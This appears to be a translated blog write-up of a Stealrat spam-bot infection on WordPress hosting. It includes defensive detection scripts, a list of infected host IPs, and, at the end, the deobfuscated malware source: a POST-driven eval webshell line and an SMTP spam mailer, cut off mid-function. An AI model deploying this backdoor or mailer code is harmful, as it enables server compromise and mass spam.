
Spam bot Stealrat

Have you heard of the Stealrat spam bot yet? Perhaps while you are reading this post, your favorite site is sending thousands of spam messages through your own mail server. There has been no mention of the Stealrat spam bots on Habr yet, which is very strange.

One of our servers was infected. The server mainly hosted WordPress sites. The problem was localized, and everything was cleaned up and closed off. All is well, but there is one thing ...

The Stealrat spam bot is built on the botnet principle. It is hosted on popular CMSs such as WordPress, Joomla! and Drupal, and on other unprotected, vulnerable sites.

In short, comrades, this is a disaster: spam bots on such a scale. Thousands of infected sites; more on this later.

Specifications


The malicious script is written in PHP. The code is compressed and passed through a code obfuscator. It contains an eval call. All data is received as an array via the POST method, base64-encoded. There is also a characteristic pattern in the form of the string "die(PHP_OS.chr(49).chr(48).chr(43).md5(0987654321));". The bot generates email messages with a random sender name based on the site's domain and tries to send them using the PHP mail function. If that function is not available, the bot tries to connect to the mail server over a socket and send through it, bypassing the mail function. Basically, the bot sends spam messages with links to porn sites, proxied through HTML pages of hacked sites. In addition to the controlling script itself, many backdoors and webshells were found in various WordPress folders. The scripts are named randomly, for example: styles.php, del.php, up.php, index.php (in folders where there was no main index file, or where it was empty), bak.php, image.php, test.php, code.php, dir.php, diff.php, etc.
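A web-root scanner built from the signs listed above, as an added example that is not part of the original post. The severity levels, the file name cache.php and the sample files are constructed for illustration; the sample files carry only the marker strings and are not working malware.

```python
import os
import re
import tempfile

# The characteristic string from the post, matched with optional whitespace
# between tokens so reformatted or re-spaced copies are still caught.
_TOKENS = re.findall(
    rb"\w+|[().]", b"die(PHP_OS.chr(49).chr(48).chr(43).md5(0987654321))"
)
DIE_MARKER = re.compile(rb"\s*".join(re.escape(t) for t in _TOKENS))
EVAL_CALL = re.compile(rb"\beval\s*\(", re.I)
B64_POST = re.compile(rb"base64_decode\s*\(\s*\$_POST\s*\[", re.I)

# File names the post lists for dropped backdoors. index.php is left out
# because it is also the normal entry point of every site.
SUSPECT_NAMES = {
    "styles.php", "del.php", "up.php", "bak.php", "image.php",
    "test.php", "code.php", "dir.php", "diff.php",
}


def classify(name, data):
    """Return (level, hits) for one PHP file; level is None when clean."""
    hits = []
    if DIE_MARKER.search(data):
        hits.append("die-marker")
    if EVAL_CALL.search(data):
        hits.append("eval")
    if B64_POST.search(data):
        hits.append("base64-post")
    if name.lower() in SUSPECT_NAMES:
        hits.append("suspect-name")
    # The die() string, or eval together with base64-decoded POST input,
    # is treated as high confidence. A lone eval or a lone file name is
    # common in legitimate code, so it is only queued for manual review.
    if "die-marker" in hits or {"eval", "base64-post"} <= set(hits):
        return "high", hits
    return ("review", hits) if hits else (None, hits)


def scan_tree(root, max_bytes=2 * 1024 * 1024):
    """Walk root and return sorted (relative_path, level, hits) tuples."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read(max_bytes)
            except OSError:
                continue  # unreadable file: skip, do not abort the scan
            level, hits = classify(name, data)
            if level:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                findings.append((rel, level, hits))
    return sorted(findings)


# Constructed sample files (inert fragments that only carry the markers).
SAMPLES = {
    "index.php": b"<?php echo 'home';",
    "wp-content/themes/x/styles.php": b"<?php echo 'ok';",
    "wp-content/uploads/diff.php":
        b"<?php die (PHP_OS.chr (49) .chr (48) .chr (43) .md5 (0987654321));",
    "wp-includes/js/cache.php":
        b"<?php $c = base64_decode($_POST['n8743bb']); eval('return 1;');",
}


def build_sample_tree(root):
    """Write the constructed samples under root."""
    for rel, body in SAMPLES.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(body)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for rel, level, hits in scan_tree(tmp):
            print(f"{level:6} {rel}  [{', '.join(hits)}]")
```

Point scan_tree at a copy or backup of the virtual host rather than the live tree, so that findings can be compared against a clean CMS release afterwards.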

Detection, signs, first measures


The first thing that caught my eye was the delay between sending and receiving mail. There were hundreds of thousands of messages waiting in the mail server's queue. Thanks to Munin for its graphs: we looked at them and were horrified. We removed all the messages from the queue. Through the Apache server status page we found strange POST requests to a PHP script on one of the virtual hosts. As you may have guessed, it was running WordPress. We disabled the malicious script by renaming the file and made a backup of the infected virtual host. We restored the site files from backup and closed access to all folders through the .htaccess file, leaving access only from our IP. In general, we restored normal operation of the site and closed off everything else, including the control panel and all additional folders with classes and additional libraries.
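The same hunt for strange POST requests can be run over access logs after the fact. The following is an added example, not code from the original post: it assumes Apache's vhost_combined log layout, an allowlist of stock WordPress POST endpoints, and constructed log lines with documentation-range addresses and hypothetical host names.

```python
import re
from collections import defaultdict

# vhost_combined: vhost:port client ident user [time] "request" status ...
LINE = re.compile(
    r'^(?P<vhost>[^\s:]+)(?::\d+)? (?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)

# Assumption: scripts a stock WordPress site legitimately receives POSTs on.
EXPECTED_POST = {
    "/wp-login.php", "/wp-cron.php", "/xmlrpc.php",
    "/wp-comments-post.php", "/wp-admin/admin-ajax.php",
}


def rank_post_targets(lines, min_hits=3, expected=EXPECTED_POST):
    """Rank PHP scripts by POST volume.

    Returns (vhost, path, post_count, distinct_clients) tuples, busiest
    first, for every script outside the allowlist with >= min_hits POSTs.
    """
    hits = defaultdict(int)
    clients = defaultdict(set)
    for line in lines:
        m = LINE.match(line)
        if not m or m["method"] != "POST":
            continue  # unparsable lines and non-POST requests are ignored
        path = m["target"].split("?", 1)[0]  # drop the query string
        if not path.lower().endswith(".php") or path in expected:
            continue
        key = (m["vhost"], path)
        hits[key] += 1
        clients[key].add(m["ip"])
    rows = [
        (vhost, path, count, len(clients[(vhost, path)]))
        for (vhost, path), count in hits.items()
        if count >= min_hits
    ]
    return sorted(rows, key=lambda r: (-r[2], r[0], r[1]))


# Constructed sample log (not taken from the incident).
_T = "[01/Jan/2000:10:00:00 +0000]"
SAMPLE_LOG = [
    f'blog.example.test:80 192.0.2.10 - - {_T} "POST /wp-content/uploads/diff.php HTTP/1.1" 200 31 "-" "-"',
    f'blog.example.test:80 192.0.2.11 - - {_T} "POST /wp-content/uploads/diff.php HTTP/1.1" 200 31 "-" "-"',
    f'blog.example.test:80 192.0.2.10 - - {_T} "POST /wp-content/uploads/diff.php HTTP/1.1" 200 31 "-" "-"',
    f'blog.example.test:80 198.51.100.20 - - {_T} "POST /wp-content/uploads/diff.php?x=1 HTTP/1.1" 200 31 "-" "-"',
    f'blog.example.test:80 198.51.100.7 - - {_T} "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    f'blog.example.test:80 198.51.100.7 - - {_T} "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    f'blog.example.test:80 198.51.100.7 - - {_T} "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    f'shop.example.test:80 203.0.113.5 - - {_T} "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    f'shop.example.test:80 203.0.113.5 - - {_T} "POST /contact.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    "not a log line",
]

if __name__ == "__main__":
    for vhost, path, count, ips in rank_post_targets(SAMPLE_LOG):
        print(f"{count:6} POSTs  {ips:4} clients  {vhost}{path}")
```

A script in an uploads or theme folder that receives many POSTs from several clients, as diff.php does in the sample, is the candidate to rename and inspect first.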

Code analysis, search for details on a malicious script


Then we began to analyze the malicious script itself, which received commands and sent messages. We formatted the code and sorted everything out. After obfuscation the code is unreadable, and the variables and functions have random names. We followed the code's execution logic and, with ordinary find-and-replace in a text editor, brought everything into a normal, readable form. Everything became clear immediately after formatting the code, and after renaming the variables and functions, the details of how the message body, the sender name and the mail headers are built became clear.

Next came a quest with the Google search engine and the original spam bot code. We tried searching for constants and for similar and repeating sections of code. The search gave no significant results, and when it did find something, it looked like this:

User 1: What is this on my website: if (isset($_POST['n8743bb'])) {base64_decode($_POST['n8743bb'])}?
User 2: Your site has been hacked, look for a webshell ...
The end.

Miraculously, we managed to find a document from Trend Micro, in PDF format (Link), in which everything was described in great detail. We compared the signs: everything is exactly the same. Well, at least we found the name of the malicious script: Stealrat. We googled the word Stealrat, and again found nothing sensible.

What did we do next?


Identifying the hole through which the malicious script was uploaded was left for "later". Instead, we modified the parsed script so that it would decrypt the data and log it, with the IP address, to a database, while appearing to work as expected, as if nothing had happened. Logging has been running for a week now. We wrote a web interface for all this, hooked up GeoIP, and were shocked ...

Currently, the logs contain about 580638 POST hits from 1223 unique IP addresses: infected sites (hosting servers, virtual hosts) in 59 countries. Most of them are from Russia.

Some statistics


Full list of infected unique IPs (1223)
106.187.93.112276JPJapan
195.225.168.238276ITItaly
173.214.187.101276USUnited StatesEdmond
70.32.78.142276USUnited StatesCulver City
46.119.10.42276UAUkraine
129.121.176.183264USUnited StatesAlbuquerque
74.220.207.175264USUnited StatesProvo
184.107.198.106264CACanadaMontr al
106.51.252.22264INIndia
117.53.153.171264MyMalaysia
108.168.130.34264USUnited StatesDallas
77.222.40.26264RuRussian Federation
77.221.130.46264RuRussian Federation
87.106.18.135264DEGermany
88.80.213.62264DEGermanyH st
68.171.222.84264USUnited StatesSouthfield
81.176.226.164264RuRussian Federation
65.99.237.17264USUnited StatesSaint Louis
69.195.198.156264USUnited StatesMiami
216.194.8.46264USUnited StatesHarrison
67.205.20.94264USUnited StatesBrea
77.232.72.80264EUEurope
208.113.229.16264USUnited StatesBrea
193.239.4.84264DEGermany
174.140.212.122264USUnited StatesLas vegas
77.222.61.113264RuRussian Federation
77.92.143.166264TRTurkeySanayi
91.199.197.222264RuRussian Federation
89.31.103.105264NLNetherlands
77.120.106.25264UAUkraine
5.178.85.12264RuRussian Federation
83.169.19.228264DEGermanyH st
199.116.78.158264USUnited StatesTraverse city
91.218.230.119252RuRussian Federation
50.57.86.110252USUnited StatesSan antonio
212.72.171.211252DEGermany
92.61.157.40252EUEurope
37.59.3.134252FRFrance
88.198.40.196252DEGermanyN rnberg
74.50.2.123252USUnited StatesAnaheim
163.178.101.196252CRCosta ricaSan josu
77.222.40.65252RuRussian Federation
184.173.107.12252USUnited StatesHouston
81.169.131.15252DEGermanyBerlin
69.175.78.58252USUnited StatesChicago
77.222.40.221252RuRussian Federation
148.251.55.181252DEGermany
62.75.230.62252DEGermany
5.250.177.86252GBUnited kingdom
77.221.130.38252RuRussian Federation
142.4.29.17252USUnited StatesProvo
199.116.78.108252USUnited StatesTraverse city
178.208.131.106252RuRussian Federation
95.169.186.78252DEGermany
77.222.57.40240RuRussian Federation
8.29.131.195240USUnited StatesCincinnati
95.168.210.61240CZCzech Republic
188.165.250.82240FRFrance
188.120.241.11240RuRussian FederationMoscow
5.9.122.105240DEGermany
192.237.186.143240USUnited StatesSan antonio
46.183.250.13240NLNetherlands
77.222.40.44240RuRussian Federation
77.221.130.31240RuRussian Federation
5.9.147.234240DEGermany
82.146.37.81240RuRussian FederationIrkutsk
95.138.189.116240GBUnited kingdom
89.184.72.80240UAUkraineKiev
173.0.129.96240USUnited StatesOrlando
98.129.239.249228USUnited StatesSan antonio
174.136.12.69228USUnited StatesDurham
85.214.149.196228DEGermanyBerlin
88.208.250.12228GBUnited kingdomGloucester
5.9.150.76228DEGermany
200.124.138.52228CWCurcaoWillemstad
82.98.144.22228ESSpain
192.99.16.165228CACanadaMontr al
88.204.108.93228RuRussian FederationTomsk
62.99.220.220228ATAustria
203.123.187.186228INIndia
91.201.52.83228RuRussian Federation
153.122.9.192228JPJapanTokyo
77.87.193.193228UAUkraine
199.231.93.131228USUnited StatesNanuet
212.102.229.234228DEGermanyOberberg
193.106.95.104228RuRussian FederationMoscow
92.61.152.95228EUEurope
178.218.166.171228HRCroatia
217.243.238.50228DEGermany
188.225.36.197228RuRussian Federation
83.169.31.225228DEGermanyH st
144.76.200.117228DEGermany
176.58.122.8216GBUnited kingdom
195.149.225.171216PLPoland
31.31.196.47216RuRussian Federation
79.96.190.30216PLPoland
208.113.153.234216USUnited StatesBrea
5.79.29.126216GBUnited kingdom
103.11.74.136216IDIndonesia
198.100.45.29216USUnited States
37.9.169.12204SKSlovakia
82.207.52.82204UAUkraine
5.63.159.22204RuRussian Federation
46.28.64.150204UAUkraine
199.116.78.161204USUnited StatesTraverse city
195.210.46.110204KZKazakhstan
81.19.186.159204GBUnited kingdom
64.55.119.44204USUnited StatesRancho cordova
23.252.121.207204USUnited StatesLos angeles
69.41.236.53204USUnited StatesHouston
50.23.81.82204USUnited StatesSan jose
46.165.220.147204DEGermany
77.221.130.17204RuRussian Federation
37.59.10.29192FRFrance
193.17.204.52192DEGermany
216.120.250.101192USUnited StatesClifton park
162.209.99.196192USUnited StatesSan antonio
77.91.205.166192PTPortugal
81.25.126.23192ESSpain
207.58.145.53192USUnited StatesMclean
112.78.2.175192VNVietnam
207.228.63.37192USUnited StatesReno
195.158.234.59192RORomania
103.244.9.7192SGSingapore
85.214.144.114192DEGermanyBerlin
81.29.203.238192ITItaly
87.106.135.33192DEGermany
85.13.143.160180DEGermany
162.243.40.27180USUnited States
82.98.134.212180ESSpain
66.225.219.33180USUnited StatesChicago
46.33.115.219180CZCzech Republic
66.199.140.243180CACanadaToronto
112.78.6.239180VNVietnam
213.168.182.122180CZCzech RepublicMlada Boleslav
91.142.208.62168ESSpainBarcelona
68.171.219.98168USUnited StatesSouthfield
69.163.180.47168USUnited StatesBrea
176.9.33.44168DEGermany
5.9.107.11168DEGermany
95.76.161.151168RORomaniaBucharest
81.177.3.76168RuRussian Federation
77.232.68.46168EUEurope
37.140.192.17168RuRussian Federation
198.154.104.66168USUnited StatesDallas
85.13.130.230168DEGermany
49.50.8.193156IDIndonesia
5.9.141.74156DEGermany
70.85.33.34156USUnited StatesHouston
46.4.90.51156DEGermany
151.78.206.227156ITItaly
77.222.56.22156RuRussian Federation
37.140.192.60144RuRussian Federation
210.211.101.21144VNVietnamHanoi
88.198.158.190144DEGermany
198.57.163.213144USUnited StatesProvo
103.249.108.101144HKHong Kong
77.222.61.197144RuRussian Federation
85.214.240.160144DEGermanyBerlin
174.136.14.109132USUnited StatesDurham
98.129.249.134132USUnited StatesSan antonio
108.168.250.16132USUnited StatesDallas
64.34.157.180132USUnited StatesNew york
217.160.168.95132DEGermany
144.76.131.196132DEGermany
213.162.246.73132NONorway
162.144.36.171132USUnited StatesProvo
198.57.205.195132USUnited StatesProvo
208.113.185.93132USUnited StatesBrea
194.100.28.115132FIFinland
79.99.203.89120BEBelgium
82.98.134.217120ESSpain
134.0.113.79120RuRussian Federation
173.236.176.122120USUnited StatesBrea
92.53.126.190120RuRussian Federation
85.13.130.227120DEGermany
77.221.130.37120RuRussian Federation
64.202.107.85120USUnited StatesChicago
212.34.156.23120ESSpain
184.173.107.20108USUnited StatesHouston
46.161.1.139108RuRussian FederationSaint Petersburg
64.5.33.166108USUnited StatesHouston
212.85.116.109108PLPoland
5.63.159.66108RuRussian Federation
89.184.78.99108UAUkraineKiev
85.25.78.183108DEGermany
148.251.47.43108DEGermany
92.53.126.11896RuRussian Federation
92.53.125.17896RuRussian Federation
92.53.112.20296RuRussian Federation
92.53.125.15896RuRussian Federation
75.126.27.9096USUnited StatesDallas
77.222.40.18596RuRussian Federation
195.234.4.6096UAUkraine
78.108.80.1096RuRussian Federation
79.96.54.19096PLPoland
77.75.35.14096TRTurkey
85.13.150.6696DEGermany
93.93.64.20684ESSpain
37.140.192.16884RuRussian Federation
92.53.126.16484RuRussian Federation
108.168.250.1372USUnited StatesDallas
108.168.250.972USUnited StatesDallas
81.177.140.17172RuRussian Federation
92.53.113.3672RuRussian Federation
70.33.246.3072CACanadaOakville
188.93.144.8672NLNetherlands
70.33.246.4072CACanadaOakville
81.176.228.272RuRussian Federation
77.222.42.17660RuRussian Federation
92.53.114.5960RuRussian Federation
199.116.78.560USUnited StatesTraverse city
216.119.155.24660USUnited StatesAtlanta
176.57.209.9260RuRussian Federation
89.161.215.6060PLPoland
108.168.219.17360USUnited StatesDallas
99.198.109.20260USUnited StatesChicago
92.53.126.19360RuRussian Federation
2.81.128.21648PTPortugalgueda
176.57.210.3248RuRussian Federation
85.13.139.12548DEGermany
92.53.98.15648RuRussian Federation
85.214.149.3848DEGermanyBerlin
74.124.195.4548USUnited StatesLos angeles
81.177.139.5148RuRussian Federation
92.53.112.19448RuRussian Federation
198.178.116.24148CACanada
192.249.114.3248USUnited StatesLos angeles
92.53.126.7248RuRussian Federation
92.53.112.2148RuRussian Federation
173.254.28.6148USUnited StatesProvo
92.53.125.3048RuRussian Federation
81.176.66.24448RuRussian Federation
65.99.239.22748USUnited StatesSaint Louis
37.140.192.5648RuRussian Federation
37.140.192.8748RuRussian Federation
190.107.17.6636COColombiaPereira
92.53.114.24536RuRussian Federation
37.140.192.7136RuRussian Federation
37.140.192.22636RuRussian Federation
81.177.141.10136RuRussian Federation
37.140.192.12636RuRussian Federation
37.140.192.3236RuRussian Federation
81.177.6.636RuRussian Federation
205.234.140.23136USUnited StatesChicago
81.177.141.3236RuRussian Federation
92.53.118.2736RuRussian Federation
37.140.192.6336RuRussian Federation
92.53.125.19636RuRussian Federation
168.144.144.3636CACanadaToronto
69.175.71.5036USUnited StatesChicago
79.96.147.10036PLPoland
195.210.29.1136SKSlovakia
91.197.230.1236GBUnited kingdom
92.53.113.21636RuRussian Federation
81.177.139.18136RuRussian Federation
184.173.107.1736USUnited StatesHouston
212.113.145.19536GBUnited kingdom
184.173.107.836USUnited StatesHouston
31.31.196.3536RuRussian Federation
92.38.226.1436RuRussian Federation
92.53.98.19136RuRussian Federation
92.53.118.14036RuRussian Federation
207.58.154.2724USUnited StatesReston
77.222.61.16024RuRussian Federation
192.185.82.24724USUnited StatesHouston
46.4.126.10624DEGermany
81.177.141.17124RuRussian Federation
178.254.9.6524DEGermany
92.53.114.324RuRussian Federation
217.107.34.9124RuRussian Federation
37.140.192.12824RuRussian Federation
176.57.209.18024RuRussian Federation
92.53.96.16124RuRussian Federation
31.31.196.3924RuRussian Federation
176.9.7.14924DEGermany
79.170.44.10624GBUnited kingdom
81.177.141.20124RuRussian Federation
81.177.141.16124RuRussian Federation
37.140.192.10624RuRussian Federation
81.177.6.7224RuRussian Federation
81.177.141.22124RuRussian Federation
81.177.135.15124RuRussian Federation
176.57.210.3524RuRussian Federation
176.57.216.224RuRussian Federation
184.154.233.224USUnited StatesChicago
37.140.192.3624RuRussian Federation
76.74.242.20024USUnited StatesNew york
91.197.228.15024GBUnited kingdom
92.53.121.5624RuRussian Federation
81.177.140.7124RuRussian Federation
184.173.107.424USUnited StatesHouston
176.57.216.9024RuRussian Federation
198.57.247.20224USUnited StatesProvo
192.185.176.22524USUnited StatesHouston
176.57.209.6924RuRussian Federation
37.140.192.11024RuRussian Federation
50.87.144.4724USUnited StatesProvo
92.53.112.8224RuRussian Federation
92.53.98.15824RuRussian Federation
81.95.96.17824CZCzech RepublicPrague
69.90.162.10024CACanadaOakville
37.140.192.20224RuRussian Federation
37.140.192.924RuRussian Federation
69.25.136.25224USUnited StatesAtlanta
37.140.192.8024RuRussian Federation
92.53.96.22024RuRussian Federation
185.21.133.10124GBUnited kingdom
92.53.126.2212RuRussian Federation
72.47.209.12712USUnited StatesCulver City
81.177.139.2112RuRussian Federation
92.53.118.11712RuRussian Federation
192.185.83.11012USUnited StatesHouston
64.188.46.13612USUnited StatesChicago
92.53.96.4912RuRussian Federation
67.227.167.6812USUnited StatesLansing
92.53.121.6812RuRussian Federation
50.87.144.18912USUnited StatesProvo
50.87.144.3812USUnited StatesProvo
91.197.231.17512GBUnited kingdom
81.177.140.1112RuRussian Federation
92.127.158.2712RuRussian Federation
79.96.63.3812PLPoland
212.85.108.20512PLPoland
92.53.96.8912RuRussian Federation
81.177.140.12112RuRussian Federation
89.161.164.19412PLPoland
192.185.83.22712USUnited StatesHouston
81.177.139.21112RuRussian Federation
188.93.212.4412RuRussian Federation
37.140.192.1312RuRussian Federation
92.53.96.2912RuRussian Federation
176.57.209.13712RuRussian Federation
217.107.34.4112RuRussian Federation
176.57.209.4812RuRussian Federation
92.53.125.5412RuRussian Federation
92.53.125.20812RuRussian Federation
92.53.96.4712RuRussian Federation
195.234.4.5012UAUkraine
92.53.125.9012RuRussian Federation
81.177.140.6412RuRussian Federation
92.53.114.8512RuRussian Federation
91.106.203.8512RuRussian Federation
176.57.210.412RuRussian Federation
81.177.141.19112RuRussian Federation
192.185.83.16212USUnited StatesHouston
81.177.139.11112RuRussian Federation
81.177.141.21112RuRussian Federation
91.218.228.15412RuRussian Federation
70.33.241.14012USUnited StatesNew york
192.185.2.22112USUnited StatesHouston
193.183.99.17112ITItalyMilan
80.172.241.4412PTPortugal
37.140.192.23812RuRussian Federation
208.38.186.10012USUnited StatesNaperville
198.57.247.18212USUnited StatesProvo
81.177.140.22112RuRussian Federation
92.53.114.12312RuRussian Federation
213.183.63.312RuRussian FederationMoscow
85.89.105.3012RuRussian Federation
81.177.139.1112RuRussian Federation
192.163.206.14212USUnited StatesProvo
192.185.4.5912USUnited StatesCedar grove
81.177.135.12112RuRussian Federation
85.158.183.14112DEGermany
92.38.226.1312RuRussian Federation
92.53.96.24012RuRussian Federation
217.107.219.19112RuRussian Federation
173.255.225.1306USUnited StatesCollege station
IPHitsCountry codeCountry NameCity


[Figure: donut chart by country and number of hits]


The source code of the malicious script (the PHP code has been reformatted, but the names of variables and functions are left unchanged)
<?php eval(base64_decode($_POST['n8743bb']));?>
<?php
@error_reporting(0);
@ini_set(chr(101).chr(114).'ror_log',NULL);
@ini_set('log_errors',0);
if(count($_POST) < 2) {
    die(PHP_OS.chr(49).chr(48).chr(43).md5(0987654321));
}
$SomeGlobalVar = false;
foreach (array_keys($_POST) as $v3c6e0b8a) {
    switch ($v3c6e0b8a[0]) {
        case chr(108): $vd56b6998 = $v3c6e0b8a; break;
        case chr(100): $v8d777f38 = $v3c6e0b8a; break;
        case chr(109): $v3d26b0b1 = $v3c6e0b8a; break;
        case chr(101); $SomeGlobalVar = true; break;
    }
}
if ($vd56b6998 === '' || $v8d777f38 === '') die(PHP_OS.chr(49).chr(49).chr(43).md5(0987654321));
$v619d75f8 = preg_split('/\,(\ +)?/', @ini_get('disable_functions'));
$v01b6e203 = @$_POST[$vd56b6998];
$v8d777f38 = @$_POST[$v8d777f38];
$v3d26b0b1 = @$_POST[$v3d26b0b1];
if ($SomeGlobalVar) {
    $v01b6e203 = n9a2d8ce3($v01b6e203);
    $v8d777f38 = n9a2d8ce3($v8d777f38);
    $v3d26b0b1 = n9a2d8ce3($v3d26b0b1);
}
$v01b6e203 = urldecode(stripslashes($v01b6e203));
$v8d777f38 = urldecode(stripslashes($v8d777f38));
$v3d26b0b1 = urldecode(stripslashes($v3d26b0b1));
if (strpos($v01b6e203, '#',1) != false) {
    $v16a9b63f = preg_split('/#/', $v01b6e203);
    $ve2942a04 = count($v16a9b63f);
} else {
    $v16a9b63f[0] = $v01b6e203;
    $ve2942a04 = 1;
}
for ($v865c0c0b=0; $v865c0c0b < $ve2942a04;$v865c0c0b++) {
    $v01b6e203 = $v16a9b63f[$v865c0c0b];
    if ($v01b6e203 == '' || !strpos($v01b6e203,'@',1)) continue;
    if (strpos($v01b6e203, ';', 1) != false) {
        list($va3da707b, $vbfbb12dc, $v081bde0c) = preg_split('/;/',strtolower($v01b6e203));
        $va3da707b = ucfirst($va3da707b);
        $vbfbb12dc = ucfirst($vbfbb12dc);
        $v3a5939e4 = next(explode('@', $v081bde0c));
        if ($vbfbb12dc == '' || $va3da707b == '') {
            $vbfbb12dc = $va3da707b = '';
            $v01b6e203 = $v081bde0c;
        } else {
            $v01b6e203 = "\"$va3da707b $vbfbb12dc\" <$v081bde0c>";
        }
    } else {
        $vbfbb12dc = $va3da707b = '';
        $v081bde0c = strtolower($v01b6e203);
        $v3a5939e4 = next(explode('@', $v01b6e203));
    }
    preg_match('|<USER>(.*)</USER>|imsU', $v8d777f38, $vee11cbb1);
    $vee11cbb1 = $vee11cbb1[1];
    preg_match('|<NAME>(.*)</NAME>|imsU', $v8d777f38, $vb068931c);
    $vb068931c = $vb068931c[1];
    preg_match('|<SUBJ>(.*)</SUBJ>|imsU', $v8d777f38, $vc34487c9);
    $vc34487c9 = $vc34487c9[1];
    preg_match('|<SBODY>(.*)</SBODY>|imsU', $v8d777f38, $v6f4b5f42);
    $v6f4b5f42= $v6f4b5f42[1];
    $vc34487c9 = str_replace("%R_NAME%", $va3da707b, $vc34487c9);
    $vc34487c9 = str_replace("%R_LNAME%", $vbfbb12dc, $vc34487c9);
    $v6f4b5f42 = str_replace("%R_NAME%", $va3da707b, $v6f4b5f42);
    $v6f4b5f42 = str_replace("%R_LNAME%", $vbfbb12dc, $v6f4b5f42);
    $v0897acf4 = preg_replace('/^(www|ftp)\./i', '', @$_SERVER['HTTP_HOST']);
    if (ne667da76($v0897acf4) || @ini_get('safe_mode'))
        $v10497e3f = false;
    else
        $v10497e3f = true;
    $v9a5cb5d8 = "$vee11cbb1@$v0897acf4";
    if ($vb068931c != '')
        $vd98a07f8 = "$vb068931c <$v9a5cb5d8>";
    else
        $vd98a07f8 = $v9a5cb5d8;
    $vb8ddc93f = "From: $vd98a07f8\r\n";
    $vb8ddc93f .= "Reply-To: $vd98a07f8\r\n";
    $v3c87b187 = "X-Priority: 3 (Normal)\r\n";
    $v3c87b187 .= "MIME-Version: 1.0\r\n";
    $v3c87b187 .= "Content-Type: text/html; charset=\"iso-8859-1\"\r\n";
    $v3c87b187 .= "Content-Transfer-Encoding: 8bit\r\n";
    $v1e66f6b4 = 'ma'.chr(105).'l';
    if (!in_array('m'.'a'.'il', $v619d75f8)) {
        if ($v10497e3f) {
            if (@$v1e66f6b4($v01b6e203, $vc34487c9, $v6f4b5f42, $vb8ddc93f.$v3c87b187, "-f$v9a5cb5d8")) {
                echo(chr(79).chr(75).md5(1234567890)."+0\n");
                continue;
            }
        } else {
            if (@$v1e66f6b4($v01b6e203, $vc34487c9, $v6f4b5f42, $v3c87b187)) {
                echo(chr(79).chr(75).md5(1234567890)."+0\n");
                continue;
            }
        }
    }
    $v4340fd73 = "Date: " . @date("D, j MYG:i:s O")."\r\n" . $vb8ddc93f;
    $v4340fd73 .= "Message-ID: <".preg_replace('/(.{7})(.{5})(.{2}).*/', '$1-$2-$3', md5(time()))."@$v0897acf4>\r\n";
    $v4340fd73 .= "To: $v01b6e203\r\n";
    $v4340fd73 .= "Subject: $vc34487c9\r\n";
    $v4340fd73 .= $v3c87b187;
    $v841a2d68 = $v4340fd73."\r\n".$v6f4b5f42;
    if ($v3d26b0b1 == '') $v3d26b0b1 = n9c812bad($v3a5939e4);
    if (($vb4a88417 = n7b0ecdff($v9a5cb5d8, $v081bde0c, $v841a2d68, $v0897acf4, $v3d26b0b1)) == 0) {
        echo(chr(79).chr(75).md5(1234567890)."+1\n");
        continue;
    } else {
        echo PHP_OS.chr(50).chr(48).'+'.md5(0987654321)."+$vb4a88417\n";
    }
}

function ne667da76($v957b527b){
    return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $v957b527b);
}

function na73fa8bd($vb45cffe0, $v11a95b8a = 0, $v7fa1b685="=\r\n", $v92f21a0f = 0, $v3303c65a = false) {
    $vf5a8e923 = strlen($vb45cffe0);
    $vb4a88417 = '';
    for($v865c0c0b = 0; $v865c0c0b < $vf5a8e923; $v865c0c0b++) {
        if ($v11a95b8a >= 75) {
            $v11a95b8a = $v92f21a0f;
            $vb4a88417 .= $v7fa1b685;
        }
        $v4a8a08f0 = ord($vb45cffe0[$v865c0c0b]);
        if (($v4a8a08f0 == 0x3d) || ($v4a8a08f0 >= 0x80) || ($v4a8a08f0 < 0x20)) {
            if ((($v4a8a08f0 == 0x0A) || ($v4a8a08f0 == 0x0D)) && (!$v3303c65a)) {
                $vb4a88417.=chr($v4a8a08f0);
                $v11a95b8a = 0;
                continue;
            }
            $vb4a88417 .='='.str_pad(strtoupper(dechex($v4a8a08f0)), 2, '0', STR_PAD_LEFT);
            $v11a95b8a += 3;
            continue;
        }
        $vb4a88417 .= chr($v4a8a08f0);
        $v11a95b8a++;
    }
    return $vb4a88417;
}

function n7b0ecdff($vd98a07f8, $v01b6e203, $v841a2d68, $v0897acf4, $v3d26b0b1) {
    global $v619d75f8;
    if (!in_array('fsockopen', $v619d75f8))
        $v66b18866 = @fsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20);
    elseif (!in_array('pfsockopen', $v619d75f8))
        $v66b18866 = @pfsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20);
    elseif (!in_array('stream_socket_client', $v619d75f8) && function_exists("stream_socket_client"))
        $v66b18866 = @stream_socket_client("tcp://$v3d26b0b1:25", $v70106d0d, $v809b1abe, 20);
    else
        return -1;
    if (!$v66b18866) {
        return 1;
    } else {
        $v8d777f38 = n54070395($v66b18866);
        @fputs($v66b18866, "EHLO $v0897acf4\r\n");
        $ve98d2f00 = n54070395($v66b18866);
        if (substr($ve98d2f00, 0, 3) != 250 ) return "2+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
        @fputs($v66b18866, "MAIL FROM:<$vd98a07f8>\r\n");
        $ve98d2f00 = n54070395($v66b18866);
        if (substr($ve98d2f00, 0, 3) != 250 ) return "3+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
